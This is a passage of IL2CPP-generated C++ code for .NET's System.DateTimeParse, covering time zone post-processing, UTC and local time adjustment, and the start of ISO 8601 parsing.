(!((int32_t)((int32_t)L_35&(int32_t)((int32_t)512)))) { goto IL_00d3; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_36 = ___result0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_37 = ___result0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_38 = L_37->get_parsedDate_11(); IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_39 = DateTime_SpecifyKind_m2E9B2B28CB3255EA842EBCBA42AF0565144D2316(L_38, 1, /*hidden argument*/NULL); L_36->set_parsedDate_11(L_39); return (bool)1; } IL_00d3: { int32_t L_40 = ___styles1; if (!((int32_t)((int32_t)L_40&(int32_t)((int32_t)16)))) { goto IL_00e0; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_41 = ___result0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_42 = DateTimeParse_AdjustTimeZoneToUniversal_mD183D3A35914ABCE48BE302A3D183882D66AE393((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_41, /*hidden argument*/NULL); return L_42; } IL_00e0: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_43 = ___result0; bool L_44 = ___bTimeOnly2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_45 = DateTimeParse_AdjustTimeZoneToLocal_mF11CDF50F3F7BA7B4E9B367D992B10736DBD264D((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_43, L_44, /*hidden argument*/NULL); return L_45; } } // System.Boolean System.DateTimeParse::DateTimeOffsetTimeZonePostProcessing(System.DateTimeResult&,System.Globalization.DateTimeStyles) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_DateTimeOffsetTimeZonePostProcessing_m15829B176BF4A494CB94C200B51506EC9522DF80 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___styles1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_DateTimeOffsetTimeZonePostProcessing_m15829B176BF4A494CB94C200B51506EC9522DF80_MetadataUsageId); s_Il2CppMethodInitialized = true; } int64_t V_0 = 0; int64_t V_1 = 0; { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (((int32_t)((int32_t)L_1&(int32_t)((int32_t)256)))) { goto IL_0033; } } { int32_t L_2 = ___styles1; if (!((int32_t)((int32_t)L_2&(int32_t)((int32_t)64)))) { goto IL_0021; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_3 = ___result0; IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_4 = ((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields*)il2cpp_codegen_static_fields_for(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var))->get_Zero_0(); L_3->set_timeZoneOffset_9(L_4); goto IL_0033; } IL_0021: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_5 = ___result0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_6 = ___result0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_7 = L_6->get_parsedDate_11(); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_8 = TimeZoneInfo_GetLocalUtcOffset_m1C5E0CC7CA725508F5180BDBF2D03C3E8DF0FBFC(L_7, 2, /*hidden argument*/NULL); L_5->set_timeZoneOffset_9(L_8); } IL_0033: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_9 = ___result0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_10 = L_9->get_address_of_timeZoneOffset_9(); int64_t L_11 = TimeSpan_get_Ticks_m829C28C42028CDBFC9E338962DC7B6B10C8FFBE7((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_10, /*hidden argument*/NULL); V_0 = L_11; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_12 = ___result0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_13 = L_12->get_address_of_parsedDate_11(); int64_t L_14 = DateTime_get_Ticks_mBCB529E43D065E498EAF08971D2EB49D5CB59D60((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_13, /*hidden argument*/NULL); int64_t L_15 = V_0; V_1 = ((int64_t)il2cpp_codegen_subtract((int64_t)L_14, (int64_t)L_15)); int64_t L_16 = V_1; if ((((int64_t)L_16) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_005e; } } { int64_t L_17 = V_1; if ((((int64_t)L_17) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_006d; } } IL_005e: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_18 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_18, 2, _stringLiteralD5CFF82A1D6E461A0E147FE9BBEA516963432F4D, NULL, /*hidden argument*/NULL); return (bool)0; } IL_006d: { int64_t L_19 = V_0; if ((((int64_t)L_19) < ((int64_t)((int64_t)-504000000000LL)))) { goto IL_0085; } } { int64_t L_20 = V_0; if ((((int64_t)L_20) <= ((int64_t)((int64_t)504000000000LL)))) { goto IL_0094; } } IL_0085: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_21 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_21, 2, _stringLiteral2B7B910762F4ACF01D021675EDD9597BFFFC8E82, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0094: { int32_t L_22 = ___styles1; if (!((int32_t)((int32_t)L_22&(int32_t)((int32_t)16)))) { goto IL_00d8; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_23 = ___result0; int32_t L_24 = L_23->get_flags_8(); if (((int32_t)((int32_t)L_24&(int32_t)((int32_t)256)))) { goto IL_00c0; } } { int32_t L_25 = ___styles1; if (((int32_t)((int32_t)L_25&(int32_t)((int32_t)64)))) { goto IL_00c0; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_26 = ___result0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_27 = DateTimeParse_AdjustTimeZoneToUniversal_mD183D3A35914ABCE48BE302A3D183882D66AE393((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_26, /*hidden argument*/NULL); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_28 = ___result0; IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_29 = ((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields*)il2cpp_codegen_static_fields_for(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var))->get_Zero_0(); L_28->set_timeZoneOffset_9(L_29); return L_27; } IL_00c0: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_30 = ___result0; int64_t L_31 = V_1; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_32; memset(&L_32, 0, sizeof(L_32)); DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F((&L_32), L_31, 1, /*hidden argument*/NULL); L_30->set_parsedDate_11(L_32); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_33 = ___result0; IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_34 = ((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields*)il2cpp_codegen_static_fields_for(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var))->get_Zero_0(); L_33->set_timeZoneOffset_9(L_34); } IL_00d8: { return (bool)1; } } // System.Boolean System.DateTimeParse::AdjustTimeZoneToUniversal(System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_AdjustTimeZoneToUniversal_mD183D3A35914ABCE48BE302A3D183882D66AE393 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_AdjustTimeZoneToUniversal_mD183D3A35914ABCE48BE302A3D183882D66AE393_MetadataUsageId); s_Il2CppMethodInitialized = true; } int64_t V_0 = 0; { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_1 = L_0->get_address_of_parsedDate_11(); int64_t L_2 = DateTime_get_Ticks_mBCB529E43D065E498EAF08971D2EB49D5CB59D60((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_1, /*hidden argument*/NULL); V_0 = L_2; int64_t L_3 = V_0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_4 = ___result0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_5 = L_4->get_address_of_timeZoneOffset_9(); int64_t L_6 = TimeSpan_get_Ticks_m829C28C42028CDBFC9E338962DC7B6B10C8FFBE7((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_5, /*hidden argument*/NULL); V_0 = ((int64_t)il2cpp_codegen_subtract((int64_t)L_3, (int64_t)L_6)); int64_t L_7 = V_0; if ((((int64_t)L_7) >= ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_002b; } } { int64_t L_8 = V_0; V_0 = ((int64_t)il2cpp_codegen_add((int64_t)L_8, (int64_t)((int64_t)864000000000LL))); } IL_002b: { int64_t L_9 = V_0; if ((((int64_t)L_9) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_003c; } } { int64_t L_10 = V_0; if ((((int64_t)L_10) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_004b; } } IL_003c: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_11 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_11, 2, _stringLiteral64BBB9C026320FA4502EF597DDC93C8AEED5FA44, NULL, /*hidden argument*/NULL); return (bool)0; } IL_004b: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_12 = ___result0; int64_t L_13 = V_0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_14; memset(&L_14, 0, sizeof(L_14)); DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F((&L_14), L_13, 1, /*hidden argument*/NULL); L_12->set_parsedDate_11(L_14); return (bool)1; } } // System.Boolean System.DateTimeParse::AdjustTimeZoneToLocal(System.DateTimeResult&,System.Boolean) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_AdjustTimeZoneToLocal_mF11CDF50F3F7BA7B4E9B367D992B10736DBD264D (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, bool ___bTimeOnly1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_AdjustTimeZoneToLocal_mF11CDF50F3F7BA7B4E9B367D992B10736DBD264D_MetadataUsageId); s_Il2CppMethodInitialized = true; } int64_t V_0 = 0; TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * V_1 = NULL; bool V_2 = false; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 V_3; memset(&V_3, 0, sizeof(V_3)); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 V_4; memset(&V_4, 0, sizeof(V_4)); bool V_5 = false; TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * G_B3_0 = NULL; int64_t G_B3_1 = 0; TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * G_B2_0 = NULL; int64_t G_B2_1 = 0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 G_B4_0; memset(&G_B4_0, 0, sizeof(G_B4_0)); TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * G_B4_1 = NULL; int64_t G_B4_2 = 0; { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_1 = L_0->get_address_of_parsedDate_11(); int64_t L_2 = DateTime_get_Ticks_mBCB529E43D065E498EAF08971D2EB49D5CB59D60((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_1, /*hidden argument*/NULL); V_0 = L_2; TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * L_3 = TimeZoneInfo_get_Local_mD208D43B3366D6E489CA49A7F21164373CEC24FD(/*hidden argument*/NULL); V_1 = L_3; V_2 = (bool)0; int64_t L_4 = V_0; if ((((int64_t)L_4) >= ((int64_t)((int64_t)864000000000LL)))) { goto IL_0063; } } { int64_t L_5 = V_0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_6 = ___result0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_7 = L_6->get_address_of_timeZoneOffset_9(); int64_t L_8 = TimeSpan_get_Ticks_m829C28C42028CDBFC9E338962DC7B6B10C8FFBE7((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_7, /*hidden argument*/NULL); V_0 = ((int64_t)il2cpp_codegen_subtract((int64_t)L_5, (int64_t)L_8)); int64_t L_9 = V_0; TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * L_10 = V_1; bool L_11 = ___bTimeOnly1; G_B2_0 = L_10; G_B2_1 = L_9; if (L_11) { G_B3_0 = L_10; G_B3_1 = L_9; goto IL_003b; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_12 = ___result0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_13 = L_12->get_parsedDate_11(); G_B4_0 = L_13; G_B4_1 = G_B2_0; G_B4_2 = G_B2_1; goto IL_0040; } IL_003b: { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_14 = DateTime_get_Now_mB464D30F15C97069F92C1F910DCDDC3DFCC7F7D2(/*hidden argument*/NULL); G_B4_0 = L_14; G_B4_1 = G_B3_0; G_B4_2 = G_B3_1; } IL_0040: { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_15 = TimeZoneInfo_GetUtcOffset_m543BC61BBFD48C648B812E442987E412E502F64A(G_B4_1, G_B4_0, 2, /*hidden argument*/NULL); V_3 = L_15; int64_t L_16 = TimeSpan_get_Ticks_m829C28C42028CDBFC9E338962DC7B6B10C8FFBE7((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&V_3), /*hidden argument*/NULL); V_0 = ((int64_t)il2cpp_codegen_add((int64_t)G_B4_2, (int64_t)L_16)); int64_t L_17 = V_0; if ((((int64_t)L_17) >= ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_00c3; } } { int64_t L_18 = V_0; V_0 = ((int64_t)il2cpp_codegen_add((int64_t)L_18, (int64_t)((int64_t)864000000000LL))); goto IL_00c3; } IL_0063: { int64_t L_19 = V_0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_20 = ___result0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_21 = L_20->get_address_of_timeZoneOffset_9(); int64_t L_22 = TimeSpan_get_Ticks_m829C28C42028CDBFC9E338962DC7B6B10C8FFBE7((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_21, /*hidden argument*/NULL); V_0 = ((int64_t)il2cpp_codegen_subtract((int64_t)L_19, (int64_t)L_22)); int64_t L_23 = V_0; if ((((int64_t)L_23) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_0082; } } { int64_t L_24 = V_0; if ((((int64_t)L_24) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_009c; } } IL_0082: { int64_t L_25 = V_0; TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * L_26 = V_1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_27 = ___result0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_28 = L_27->get_parsedDate_11(); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_29 = TimeZoneInfo_GetUtcOffset_m543BC61BBFD48C648B812E442987E412E502F64A(L_26, L_28, 2, /*hidden argument*/NULL); V_3 = L_29; int64_t L_30 = TimeSpan_get_Ticks_m829C28C42028CDBFC9E338962DC7B6B10C8FFBE7((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&V_3), /*hidden argument*/NULL); V_0 = ((int64_t)il2cpp_codegen_add((int64_t)L_25, (int64_t)L_30)); goto IL_00c3; } IL_009c: { int64_t L_31 = V_0; DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&V_4), L_31, 1, /*hidden argument*/NULL); V_5 = (bool)0; int64_t L_32 = V_0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_33 = V_4; TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * L_34 = TimeZoneInfo_get_Local_mD208D43B3366D6E489CA49A7F21164373CEC24FD(/*hidden argument*/NULL); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_35 = TimeZoneInfo_GetUtcOffsetFromUtc_mAA79026F581A893DD65B95D5660E146520B471FA(L_33, L_34, (bool*)(&V_5), (bool*)(&V_2), /*hidden argument*/NULL); V_3 = L_35; int64_t L_36 = TimeSpan_get_Ticks_m829C28C42028CDBFC9E338962DC7B6B10C8FFBE7((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&V_3), /*hidden argument*/NULL); V_0 = ((int64_t)il2cpp_codegen_add((int64_t)L_32, (int64_t)L_36)); } IL_00c3: { int64_t L_37 = V_0; if ((((int64_t)L_37) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_00d4; } } { int64_t L_38 = V_0; if ((((int64_t)L_38) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_00ee; } } IL_00d4: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_39 = ___result0; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_40 = ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->get_MinValue_31(); L_39->set_parsedDate_11(L_40); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_41 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_41, 2, _stringLiteral64BBB9C026320FA4502EF597DDC93C8AEED5FA44, NULL, /*hidden argument*/NULL); return (bool)0; } IL_00ee: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_42 = ___result0; int64_t L_43 = V_0; bool L_44 = V_2; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_45; memset(&L_45, 0, sizeof(L_45)); DateTime__ctor_m8946C6F0EFB7933840C449A2C859B08101393A84((&L_45), L_43, 2, L_44, /*hidden argument*/NULL); L_42->set_parsedDate_11(L_45); return (bool)1; } } // System.Boolean System.DateTimeParse::ParseISO8601(System.DateTimeRawInfo&,System.__DTString&,System.Globalization.DateTimeStyles,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseISO8601_mC6C5A03B75BD943D6CC59E696B0AC2641E1C0C96 (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw0, __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str1, int32_t ___styles2, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_ParseISO8601_mC6C5A03B75BD943D6CC59E696B0AC2641E1C0C96_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; double V_3 = 0.0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 V_4; memset(&V_4, 0, sizeof(V_4)); Il2CppChar V_5 = 0x0; { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_0 = ___raw0; int32_t L_1 = L_0->get_year_3(); if ((((int32_t)L_1) < ((int32_t)0))) { goto IL_001d; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_2 = ___raw0; int32_t L_3 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_2, 0, /*hidden argument*/NULL); if ((((int32_t)L_3) < ((int32_t)0))) { goto IL_001d; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_4 = ___raw0; int32_t L_5 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_4, 1, /*hidden argument*/NULL); } IL_001d: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_6 = ___str1; int32_t* L_7 = L_6->get_address_of_Index_1(); int32_t* L_8 = L_7; int32_t L_9 = *((int32_t*)L_8); *((int32_t*)L_8) = (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_9, (int32_t)1)); V_2 = 0; V_3 = (0.0); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_10 = ___str1; __DTString_SkipWhiteSpaces_mB4AA5270916EF04CD52A4F3C16B1FB08D0B0CF4F((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_10, /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_11 = ___str1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_12 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_11, 2, (int32_t*)(&V_0), /*hidden argument*/NULL); if (L_12) { goto IL_0054; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_13 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_13, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0054: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_14 = ___str1; __DTString_SkipWhiteSpaces_mB4AA5270916EF04CD52A4F3C16B1FB08D0B0CF4F((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_14, /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_15 = ___str1; bool L_16 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_15, ((int32_t)58), /*hidden argument*/NULL); if (L_16) { goto IL_0073; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_17 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_17, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0073: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_18 = ___str1; __DTString_SkipWhiteSpaces_mB4AA5270916EF04CD52A4F3C16B1FB08D0B0CF4F((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_18, /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_19 = ___str1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_20 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_19, 2, (int32_t*)(&V_1), /*hidden argument*/NULL); if (L_20) { goto IL_0093; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_21 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_21, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0093: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_22 = ___str1; __DTString_SkipWhiteSpaces_mB4AA5270916EF04CD52A4F3C16B1FB08D0B0CF4F((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_22, /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_23 = ___str1; bool L_24 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_23, ((int32_t)58), /*hidden argument*/NULL); if (!L_24) { goto IL_00f7; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_25 = ___str1; __DTString_SkipWhiteSpaces_mB4AA5270916EF04CD52A4F3C16B1FB08D0B0CF4F((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_25, /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_26 = ___str1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_27 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_26, 2, (int32_t*)(&V_2), /*hidden argument*/NULL); if (L_27) { goto IL_00c3; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_28 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_28, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_00c3: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_29 = ___str1; bool L_30 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_29, ((int32_t)46), /*hidden 